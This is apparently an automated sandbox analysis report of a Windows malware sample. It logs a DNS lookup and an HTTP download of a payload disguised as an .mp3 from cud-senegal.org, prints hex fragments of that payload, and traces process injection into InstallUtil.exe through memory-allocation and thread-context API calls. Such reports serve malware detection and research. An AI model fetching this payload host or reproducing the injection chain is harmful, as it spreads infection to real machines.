                                    Jan 14, 2025 15:18:25.342667103 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.342761993 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.343787909 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.343816042 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.344028950 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.344062090 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.344083071 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.344361067 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.345268965 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.345295906 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.345452070 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.345627069 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.345659971 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.345830917 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.346817970 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.346846104 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.346988916 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.347079039 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.347110987 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.347224951 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.347353935 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.348321915 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.348350048 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.348520994 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.348603964 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.348635912 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.348702908 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.348891020 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.349680901 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.349708080 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.349898100 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.349915028 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.350068092 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.350172997 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.351315975 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.351346016 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.351505041 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.351675987 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.351707935 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.352026939 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.352801085 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.352828026 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.352966070 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.353065014 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.353096962 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.353127956 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.353310108 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.354309082 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.354337931 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.354520082 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.354554892 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.354572058 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.354809999 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.355822086 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.355849028 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.356041908 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.356087923 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.356101036 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.356225967 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.356362104 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.357319117 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.357347012 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.357459068 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.357485056 CET4434972651.159.14.89192.168.11.20
                                    Jan 14, 2025 15:18:25.357631922 CET49726443192.168.11.2051.159.14.89
                                    Jan 14, 2025 15:18:25.360295057 CET49726443192.168.11.2051.159.14.89
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 14, 2025 15:18:23.215791941 CET5236153192.168.11.201.1.1.1
                                    Jan 14, 2025 15:18:23.516415119 CET53523611.1.1.1192.168.11.20
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 14, 2025 15:18:23.215791941 CET192.168.11.201.1.1.10x6b90Standard query (0)cud-senegal.orgA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 14, 2025 15:18:23.516415119 CET1.1.1.1192.168.11.200x6b90No error (0)cud-senegal.org51.159.14.89A (IP address)IN (0x0001)false
                                    • cud-senegal.org
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.11.204972651.159.14.894436584C:\Users\user\Desktop\TiOWA908TP.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-14 14:18:23 UTC215OUTGET /post-postlogin/Gjflop.mp3 HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                    Host: cud-senegal.org
                                    Connection: Keep-Alive
                                    2025-01-14 14:18:24 UTC209INHTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Tue, 14 Jan 2025 14:18:24 GMT
                                    Content-Type: audio/mpeg
                                    Content-Length: 1377288
                                    Connection: close
                                    Last-Modified: Tue, 14 Jan 2025 08:26:21 GMT
                                    Accept-Ranges: bytes
                                    2025-01-14 14:18:24 UTC16175INData Raw: 31 bf 4a da 98 53 f2 e8 04 cd 86 60 9d c8 72 27 f4 63 3a 01 a6 b2 da 58 6a 75 07 32 a6 dd 63 1e 69 19 d0 f5 8b 71 d4 2a 4f 3d 80 a0 36 6f 66 c9 93 9a b9 97 06 fb 1c b1 40 ca 44 5b 8d 6f 84 e9 0e 3b 5f ff 4e 6f f2 b6 e5 8c 85 6f ac 20 a4 10 46 67 ec 98 75 93 63 74 d2 c2 9c f4 33 cb 47 56 7f b2 8d 68 f2 3a 90 1c 7c 43 54 1e dc e8 bc 9d 00 5e 12 d9 62 05 a5 25 2a 44 2e 5f 63 1d 4a b7 9d e9 d9 c8 85 42 44 e7 47 51 00 60 cf c1 c8 7b 45 8e d7 54 3a 7a fb 8a 8e aa 1f 40 8f 92 8c fb 16 5e 76 fc 8e 59 4f 7e 16 a6 e9 48 49 b5 3e 93 f1 99 73 9d 72 64 2b d1 01 c8 13 59 b2 cd f1 d3 72 82 bf 96 0e 1d 5b bf 82 28 9d 94 f7 c9 e8 68 3d 6c d5 72 2c be ff a2 76 8f 9b bd f4 a3 2a 35 28 41 e2 25 23 da fa 08 81 2b f9 80 23 57 93 ea 84 b5 67 f3 08 fd 5f 2d 5a 31 2c 20 65 42 79
                                    Data Ascii: 1JS`r'c:Xju2ciq*O=6of@D[o;_Noo Fguct3GVh:|CT^b%*D._cJBDGQ`{ET:z@^vYO~HI>srd+Yr[(h=lr,v*5(A%#+#Wg_-Z1, eBy
                                    2025-01-14 14:18:24 UTC16384INData Raw: db df 0c 34 06 28 25 9f ab 1a e2 d5 e1 cb 26 fd 28 ca 5e b8 3a 0c 35 df bc 1c 70 45 20 6a 30 c1 87 92 d9 d6 e6 4a ce 06 3f b6 50 15 1d f9 f8 d6 55 a4 55 5c df 65 ba 3a 06 1a 30 0c 9a ff 9a 6a 84 15 c1 a8 af 37 ae 18 f3 27 78 5a d6 a7 2c 7e 35 de c3 0a c0 db 2a 2c 1a 01 64 03 e0 1f de 84 8c 20 08 05 f1 01 cb 20 92 f4 02 ca 92 a0 fc 6c c0 a4 b5 1d 53 b9 d1 bd d2 20 2b ca 07 81 af 6c 89 f1 47 9a 85 0a 29 00 61 25 a8 f7 e8 84 28 a3 fb 63 24 51 ad 3a a5 2a 8e d9 64 e8 1e aa 8e 47 71 8c 55 5d c1 33 dd 8e 53 72 a5 47 b4 61 f6 74 87 45 ee 67 1b 6d 0c 2a 30 cc bc 33 a5 58 f3 50 37 b4 46 6f 76 7b bf a4 51 4e 96 2f 41 38 89 0e 16 d8 39 0b d0 9b 94 26 96 55 8a 4c 15 0c bb 9f ec 81 72 55 5f 8b 36 62 09 dc a6 f2 f8 19 a0 68 a2 26 ef c4 5c f4 4c ab ca bf 2b 06 e4 fc 6b
                                    Data Ascii: 4(%&(^:5pE j0J?PUU\e:0j7'xZ,~5*,d lS +lG)a%(c$Q:*dGqU]3SrGatEgm*03XP7Fov{QN/A89&ULrU_6bh&\L+k
                                    2025-01-14 14:18:24 UTC16384INData Raw: 93 95 93 80 b2 52 6f 6e 47 25 dc 88 87 e9 2f 85 42 44 58 f7 d2 ae c9 1d 2e bd 0b 38 82 80 d8 e1 62 70 b5 e2 a5 87 00 54 9c 8b 38 11 6b 95 a8 d9 7d 99 fd 4c 39 e1 9f b0 34 09 8f 82 13 c3 ef 48 f2 0a 2e a1 51 1d 6d bd 4c 5f ee bc f0 35 f0 9e 0b ba 79 a4 21 99 6c 50 25 35 a6 fc 10 41 f5 6d 7b f0 98 d9 01 b1 8b 32 86 ce 2d ad 50 e1 2f fa d5 df eb e6 de 35 4e ed 6a e6 8b cc 5f 6f 01 d9 8b cd 59 04 67 a6 ec 22 ea 72 68 13 09 7b 23 73 79 3e f2 da 48 b8 39 8a 0f 95 f6 5e 0d 09 00 06 a8 2a c7 2e 68 8c ba 59 36 98 ba 8d c7 4b 96 f6 01 45 bb a7 24 8a 32 c5 d8 c4 67 3b cc ba f6 a3 9e b3 e8 88 c8 db 97 47 9c f5 d4 ca 44 c7 fc 63 ec d3 2b 81 ac 81 3c 2b fe ca 06 5e f4 37 27 7a c4 21 b1 a0 ef 74 cf 36 ab 8b a3 e6 f9 54 b8 b3 28 12 26 33 c9 60 9b 25 f2 3c 0c 81 47 8a 7f
                                    Data Ascii: RonG%/BDX.8bpT8k}L94H.QmL_5y!lP%5Am{2-P/5Nj_oYg"rh{#sy>H9^*.hY6KE$2g;GDc+<+^7'z!t6T(&3`%<G
                                    2025-01-14 14:18:24 UTC16384INData Raw: ae 2d fa 93 4f 0e 09 4f 23 4b 8c cf df 17 1e 21 6a da d8 8e 2c 91 86 14 b8 f9 bc 05 8f 2c 15 b2 51 f0 1c 43 ac 9c 9e 55 e6 ea f4 15 b3 3c 4e 7a f0 ff c2 52 56 20 f8 d6 27 6d 2d b5 06 4c 42 e5 cd 1a e1 bd 78 0a a0 d3 df df 3e 68 df c0 b9 96 da 39 43 24 73 ea f5 7f b1 9b 49 70 5b 64 a3 ae 76 b8 e7 04 7d 81 68 4f ad 05 4f 86 bb c5 bb a8 05 24 cc fc 5b c4 eb 3f 10 4a 3b 9c 06 37 b9 c6 c6 12 37 aa b7 37 81 50 a1 e3 1d 96 74 9d 08 3d 3e 95 59 74 cc 0f b2 0a 93 71 c6 96 c5 9a e7 c1 84 42 de 38 08 63 77 81 e5 b6 51 ff aa e3 3b f6 45 b4 8c 47 ba 6f 1a 65 da 77 1d f8 ca 18 34 f3 c7 f2 68 87 57 ce 1b ad b3 97 83 24 b9 93 9e cd 80 e2 17 64 45 c3 29 9a f2 06 e0 b7 d3 95 6d 68 db 36 46 2e b4 0a ba 3f 44 5c 82 52 d9 25 f8 13 de 07 80 78 ea 1c 89 3b 88 19 77 60 b2 f6 ab
                                    Data Ascii: -OO#K!j,,QCU<NzRV 'm-LBx>h9C$sIp[dv}hOO$[?J;777Pt=>YtqB8cwQ;EGoew4hW$dE)mh6F.?D\R%x;w`
                                    2025-01-14 14:18:24 UTC16384INData Raw: f8 a9 a7 aa ac 2f 11 6c 13 53 fd 10 dc 4f ed a7 1c b4 95 e3 38 64 51 e2 42 cf 46 d4 60 9f ba 63 49 d0 b4 5e 0d 7b 22 bc fc 9e ab 74 cd fb cb 5e cf 49 49 8c fe 67 51 88 63 99 d2 1f 9e 28 60 1f bd f8 b5 af c9 cd 03 60 29 f6 bf 54 9f c9 a6 38 5a 38 c3 21 b4 ed b0 5f 5a 7f 78 e3 d2 75 fd 5b 8f 87 51 1c f2 32 52 7e 4b f1 92 57 0c 7e 1b 8b c1 bc 60 c4 80 59 0a 56 2a b3 41 2f 61 42 11 b3 2f d1 df 2f f4 eb a9 a7 92 0d ec a8 ee eb 85 6b 95 14 df 69 43 38 ff 27 92 da 9d b8 0f f0 7c 5d 14 9d 45 f0 62 ff 6f ef 29 79 78 2e 4b 06 b8 da 5b 71 7b 41 12 c5 cd bb 83 8d 5c a3 2b 2f b5 07 85 80 cb b9 45 fb d7 fc 72 5f 38 75 d1 38 cb e8 a7 96 6f 12 b3 d8 8c b2 f8 43 3e c3 8a 0e 3f be 92 77 f6 af 70 88 57 42 5d 10 99 e8 44 6a a2 69 e1 9b 03 c7 53 e0 65 ed ac f5 b0 dc d7 ca bc
                                    Data Ascii: /lSO8dQBF`cI^{"t^IIgQc(``)T8Z8!_Zxu[Q2R~KW~`YV*A/aB//kiC8'|]Ebo)yx.K[q{A\+/Er_8u8oC>?wpWB]DjiSe
                                    2025-01-14 14:18:24 UTC16384INData Raw: 64 6d 76 de e5 c1 62 38 2b c7 91 5c 82 2d 30 07 f5 26 98 16 f8 36 b1 ba 4a de dd b5 98 31 50 57 1d 64 8b 91 e7 02 a1 53 c0 39 72 24 75 6b ca 8a c1 87 42 40 e2 3c 83 10 2b 38 07 15 06 0b 37 5c e6 58 3f 05 95 a6 26 47 4c ab c9 e8 8e a6 10 a8 90 3d 38 83 7e e4 8b 5b a0 f4 22 61 a6 0c 21 2d d9 5b ec e0 24 d1 d1 29 9d 97 fb 35 a5 27 5a 85 35 a4 2c 44 ee 4b fb c7 f9 24 c0 57 42 9f e4 74 52 a2 53 e7 cd 6d 95 c4 73 f6 d6 ed 49 10 ce ce 21 f9 ca f9 fb fb b0 ba 9e 1d cc 03 ae d7 6a fe 05 51 12 23 0f 0a cd 47 53 ea 38 c8 c3 d1 fd a3 ef 7f b6 c5 37 4e 43 86 db 34 28 5e 5c 18 3f c0 fa 53 dc fd bd ae 09 33 bd 85 e4 af f9 8d 93 45 2a fa 59 17 2c c3 9b 11 07 a7 a2 ca 4c e7 13 e7 55 61 c4 0d 46 58 4a cb 89 14 07 c2 90 84 4d 15 7f 30 db 2f ab fa 4b 94 1c ba 4f 47 9b 02 09
                                    Data Ascii: dmvb8+\-0&6J1PWdS9r$ukB@<+87\X?&GL=8~["a!-[$)5'Z5,DK$WBtRSmsI!jQ#GS87NC4(^\?S3E*Y,LUaFXJM0/KOG
                                    2025-01-14 14:18:24 UTC16384INData Raw: ae b8 b8 69 b1 68 e1 e4 68 b9 f3 e3 be 99 8e 21 f1 c9 d5 be 67 68 a9 bb 70 cc 6e 34 7a a7 cb fa 73 ed 5e b2 ea 45 2b f6 3d 89 7e 34 47 79 5d ff 6c 58 64 54 76 e6 f3 b4 0a 6d 9f 07 08 b1 ba c3 12 eb aa 8d 14 1e 09 8f 7f 49 46 32 89 16 7f 6f 7c 07 b6 de 17 06 95 df b7 bb 7b 1a 01 92 d9 0b 49 69 6c 74 78 e2 09 53 01 a3 49 38 fa 7c 17 00 99 4c 6e f3 33 aa 23 6c b3 90 f9 ec b2 3d 24 96 1b e9 c4 60 d5 48 e3 12 34 49 e2 cd a8 96 4b 89 b1 19 89 a1 10 82 e4 0e 1b b8 a5 67 96 41 78 b3 88 45 0f 4c 2f 2a 03 2c 47 d7 cf d6 ee ee 4d ad 4b ef d2 0d 0e 00 72 64 6b 8f 9c f5 ec a7 6b ec af 63 98 47 51 40 f6 78 f9 80 85 33 64 d2 64 ed 97 18 e9 84 a1 f6 41 cb 08 f8 16 e5 c8 f1 bb 02 a7 0d 13 1e b9 aa 3c 64 14 64 b8 21 71 30 7e e7 42 12 e8 4d 0a e6 18 ca d3 5b 0a ed bc 71 68
                                    Data Ascii: ihh!ghpn4zs^E+=~4Gy]lXdTvmIF2o|{IiltxSI8|Ln3#l=$`H4IKgAxEL/*,GMKrdkkcGQ@x3ddA<dd!q0~BM[qh
                                    2025-01-14 14:18:24 UTC16384INData Raw: fa 5e 35 23 9f 1e 97 fe c5 ce 33 73 67 3b 0f 45 7a 08 21 72 fc 8b 45 7a 42 1b c2 a0 fb f6 8d 83 4c 1c 44 8a f9 20 22 4d 88 bf 77 bc a7 2c ac 85 f5 2a a0 9c d4 7a e9 58 f2 32 59 03 ce 3e 20 f1 87 58 f5 6d 6e 76 ae bb 38 9b 4d 03 b9 48 aa 7f c9 e7 f6 ed b2 fa 56 c6 b2 e1 fb 82 9e 79 bb 8e f3 0e 5f c2 9f 15 3a e5 63 1e d1 fc 94 e9 43 ee ee f8 2a f1 36 4d a2 21 51 b3 04 71 bd 96 b1 75 08 e2 58 1e db e5 27 db ee 54 1c dd 8d 5e f4 70 39 7e 83 04 f6 b1 2e 82 a9 62 54 6b 73 c1 f1 6b 52 97 f7 d3 21 53 d7 89 3a 33 4e e8 e4 d6 8d 3e e1 0d 86 f2 b1 6b 6e f2 27 b1 5e 47 c5 c0 8c dd 3f f6 a9 a8 7e 75 05 36 c5 eb aa fd 2b 30 31 31 89 b0 61 48 9d 7b 70 2e 27 6f e5 9a 74 8d 21 7f 06 78 50 75 f5 a2 09 d3 56 f9 fc ad 1e c5 11 74 6f 2a af 8f 80 75 9e 2d fd c3 00 f1 88 33 04
                                    Data Ascii: ^5#3sg;Ez!rEzBLD "Mw,*zX2Y> Xmnv8MHVy_:cC*6M!QquX'T^p9~.bTkskR!S:3N>kn'^G?~u6+011aH{p.'ot!xPuVto*u-3
                                    2025-01-14 14:18:24 UTC16384INData Raw: 8b bd 1f 69 53 d0 43 8c c1 fd 25 b7 14 fa 5b 13 94 d0 f9 be 71 1f 4a 24 cc 0c c3 a9 fb b3 14 1b a6 9f 15 ac 04 5b e0 58 d4 8a 8f 6b fc 9b 14 19 23 47 63 c2 a0 58 b1 6c 77 14 36 4e 15 55 38 e0 95 d5 95 88 c9 48 6d 0c 5d 3f 5a 9d 06 05 d7 ec 68 c9 84 f4 1b 41 8e a3 8c 7f 3a c0 2a 3a 9f 91 cb 4e f0 03 39 ff bb 12 b5 e1 7a 8a 77 88 7b cc 07 97 97 2c 6b a2 d8 36 c8 7a f5 74 ee 87 eb b0 2b 5d e2 7a 4f bb d7 a4 87 27 7a c0 d6 ad 30 e9 18 98 63 b9 ab 62 79 5a ca 57 b2 e2 73 a4 1e 18 af 8e 99 66 4c d4 60 d8 de 71 18 4d 3c b9 92 c3 a2 7d 0d d5 ad 34 69 69 38 96 0c 70 fd a7 e0 b7 44 fa 36 e3 9d 59 0d 24 ac 24 03 52 4b 14 a4 90 a7 0e 60 4f 9d 38 f5 d2 8c 6f c1 60 89 d6 00 b8 3e ec 3a ee c4 c4 6f 72 a9 f5 99 30 ca 29 2d f2 10 78 fd 6c 93 91 3a c5 cf 62 21 63 72 0b 1c
                                    Data Ascii: iSC%[qJ$[Xk#GcXlw6NU8Hm]?ZhA:*:N9zw{,k6zt+]zO'z0cbyZWsfL`qM<}4ii8pD6Y$$RK`O8o`>:or0)-xl:b!cr
                                    2025-01-14 14:18:24 UTC16384INData Raw: 8f a6 33 db 73 b1 78 b2 79 87 f1 55 09 05 6c be 44 76 0c 2e 5e 0e b6 1a d4 d0 4d 43 0b eb c4 bc 6b ad c6 a9 6c aa 18 df a4 70 41 82 3b 92 0b 5f d2 21 fc 09 74 e8 ce 8b 51 40 b9 a2 1d e1 cf 99 bd 3d 7b ef 8b 57 20 d4 a5 f7 2f 1a b4 d3 33 03 5c 49 6e 39 61 2e de 5e 60 37 97 3b 55 76 1e 64 50 b0 ba cb df 6f df 28 5f b9 af 99 62 19 44 74 c5 d6 a4 55 f5 a4 a9 be 19 1f eb 41 de a0 52 dd d8 2b 2a dd da 8c 48 70 6c bc 24 d3 34 37 73 36 53 e0 ee fb cb 56 b9 b9 78 8a c1 5b c6 3b 37 c2 1d 04 24 2b f8 7e f7 39 f1 d9 f6 9a a2 0b d7 77 0d 72 0a ac 2f 04 93 2a 25 a0 f6 e1 10 b3 cb d8 4c 87 27 95 0c 84 d5 7f f6 d5 39 f3 61 4e 84 c2 d6 4e de 0c e8 de 75 15 0b 8a f4 33 9f f5 c6 14 f2 f0 d2 4d 20 ab ee 05 06 25 48 b6 d9 39 6f 15 3c b4 d4 31 1a f1 c2 4a 33 9a 16 03 cf c5 e8
                                    Data Ascii: 3sxyUlDv.^MCklpA;_!tQ@={W /3\In9a.^`7;UvdPo(_bDtUAR+*Hpl$47s6SVx[;7$+~9wr/*%L'9aNNu3M %H9o<1J3


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:09:18:22
                                    Start date:14/01/2025
                                    Path:C:\Users\user\Desktop\TiOWA908TP.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\TiOWA908TP.exe"
                                    Imagebase:0x290000
                                    File size:104'857'600 bytes
                                    MD5 hash:F1BBCBCF580673F86692045F0E6C1141
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.4815695727.000000000276D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.4836173880.0000000006580000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:09:18:46
                                    Start date:14/01/2025
                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                    Imagebase:0xa30000
                                    File size:42'064 bytes
                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:4
                                    Start time:09:18:46
                                    Start date:14/01/2025
                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7596 -s 1084
                                    Imagebase:0x480000
                                    File size:482'640 bytes
                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:10.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:3.6%
                                      Total number of Nodes:165
                                      Total number of Limit Nodes:7
                                      execution_graph 58706 251d030 58707 251d048 58706->58707 58708 251d0a3 58707->58708 58711 6280f88 58707->58711 58716 6280f7c 58707->58716 58712 6280fb0 58711->58712 58721 6281408 58712->58721 58726 6281418 58712->58726 58713 6280fd7 58713->58713 58717 6280fb0 58716->58717 58719 6281408 2 API calls 58717->58719 58720 6281418 2 API calls 58717->58720 58718 6280fd7 58718->58718 58719->58718 58720->58718 58722 6281445 58721->58722 58723 6280530 2 API calls 58722->58723 58725 62815db 58722->58725 58724 62815cc 58723->58724 58724->58713 58725->58713 58727 6281445 58726->58727 58728 6280530 2 API calls 58727->58728 58730 62815db 58727->58730 58729 62815cc 58728->58729 58729->58713 58730->58713 58702 5565190 58703 55651f4 CreateProcessA 58702->58703 58705 556537c 58703->58705 58510 25a21c0 58511 25a21dc 58510->58511 58512 25a21ec 58511->58512 58517 25a7a6b 58511->58517 58521 25a5980 58511->58521 58526 25a935f 58511->58526 58531 25a93d9 58511->58531 58537 6281800 58517->58537 58541 6281810 58517->58541 58518 25a7a8c 58522 25a599f 58521->58522 58558 6280520 58522->58558 58563 6280530 58522->58563 58523 25a59c3 58523->58512 58527 25a936b 58526->58527 58529 6280520 2 API calls 58527->58529 58530 6280530 2 API calls 58527->58530 58528 25a937a 58529->58528 58530->58528 58532 25a936b 58531->58532 58533 25a93e0 58531->58533 58535 6280520 2 API calls 58532->58535 58536 6280530 2 API calls 58532->58536 58534 25a937a 58535->58534 58536->58534 58538 6281825 58537->58538 58545 6281850 58538->58545 58542 6281825 58541->58542 58544 6281850 2 API calls 58542->58544 58543 628183d 58543->58518 58544->58543 58547 6281887 58545->58547 58546 628183d 58546->58518 58550 6281968 58547->58550 58554 6281961 58547->58554 58551 62819a8 VirtualAlloc 58550->58551 58553 62819e2 58551->58553 58553->58546 58555 62819a8 VirtualAlloc 58554->58555 58557 62819e2 58555->58557 58557->58546 58560 6280534 58558->58560 58559 6280614 58559->58523 58568 6280978 58560->58568 58572 6280980 58560->58572 58565 6280557 58563->58565 58564 6280614 58564->58523 58566 6280978 VirtualProtect 58565->58566 58567 6280980 VirtualProtect 58565->58567 58566->58564 58567->58564 58569 62809c8 VirtualProtect 58568->58569 58571 6280a03 58569->58571 58571->58559 58573 62809c8 VirtualProtect 58572->58573 58575 6280a03 58573->58575 58575->58559 58576 6668859 58577 6668863 58576->58577 58581 663a648 58577->58581 58586 663a658 58577->58586 58578 66688a1 58582 663a658 58581->58582 58583 663a683 58582->58583 58591 663ac52 58582->58591 58598 663a87c 58582->58598 58583->58578 58587 663a66d 58586->58587 58588 663ac52 8 API calls 58587->58588 58589 663a87c 8 API calls 58587->58589 58590 663a683 58587->58590 58588->58590 58589->58590 58590->58578 58592 663a6ef 58591->58592 58593 663a87d 58591->58593 58593->58592 58604 663c0e2 58593->58604 58609 663c0a0 58593->58609 58613 663c092 58593->58613 58594 663a9e1 58594->58583 58599 663a882 58598->58599 58601 663c0e2 8 API calls 58599->58601 58602 663c092 8 API calls 58599->58602 58603 663c0a0 8 API calls 58599->58603 58600 663a9e1 58600->58583 58601->58600 58602->58600 58603->58600 58605 663c0b9 58604->58605 58607 663c0ea 58604->58607 58617 663c3c6 58605->58617 58607->58594 58610 663c0b5 58609->58610 58612 663c3c6 8 API calls 58610->58612 58611 663c0d7 58611->58594 58612->58611 58614 663c0a0 58613->58614 58616 663c3c6 8 API calls 58614->58616 58615 663c0d7 58615->58594 58616->58615 58618 663c3de 58617->58618 58622 663c9d1 58618->58622 58631 663c9e0 58618->58631 58619 663c0d7 58619->58594 58623 663c9e0 58622->58623 58624 663ca17 58623->58624 58640 663d761 58623->58640 58645 663cfcc 58623->58645 58650 663d4ce 58623->58650 58655 663d38b 58623->58655 58660 663d69b 58623->58660 58665 663d146 58623->58665 58624->58619 58632 663c9f5 58631->58632 58633 663ca17 58632->58633 58634 663d761 2 API calls 58632->58634 58635 663d146 2 API calls 58632->58635 58636 663d69b 2 API calls 58632->58636 58637 663d38b 2 API calls 58632->58637 58638 663d4ce 2 API calls 58632->58638 58639 663cfcc 2 API calls 58632->58639 58633->58619 58634->58633 58635->58633 58636->58633 58637->58633 58638->58633 58639->58633 58641 663d6c1 58640->58641 58670 5567734 58641->58670 58674 55679a8 58641->58674 58642 663d741 58646 663cfd6 58645->58646 58678 5567001 58646->58678 58682 5567008 58646->58682 58647 663d8b2 58651 663d4dd 58650->58651 58686 5567c10 58651->58686 58690 5567c18 58651->58690 58652 663d460 58656 663d390 58655->58656 58657 663cea9 58656->58657 58694 5568230 58656->58694 58698 5568238 58656->58698 58657->58624 58661 663d6a5 58660->58661 58663 5567734 VirtualAllocEx 58661->58663 58664 55679a8 VirtualAllocEx 58661->58664 58662 663d741 58663->58662 58664->58662 58666 663d155 58665->58666 58668 5567001 Wow64SetThreadContext 58666->58668 58669 5567008 Wow64SetThreadContext 58666->58669 58667 663d184 58668->58667 58669->58667 58671 55679a8 VirtualAllocEx 58670->58671 58673 5567a25 58671->58673 58673->58642 58675 55679e8 VirtualAllocEx 58674->58675 58677 5567a25 58675->58677 58677->58642 58679 5567008 Wow64SetThreadContext 58678->58679 58681 5567095 58679->58681 58681->58647 58683 556704d Wow64SetThreadContext 58682->58683 58685 5567095 58683->58685 58685->58647 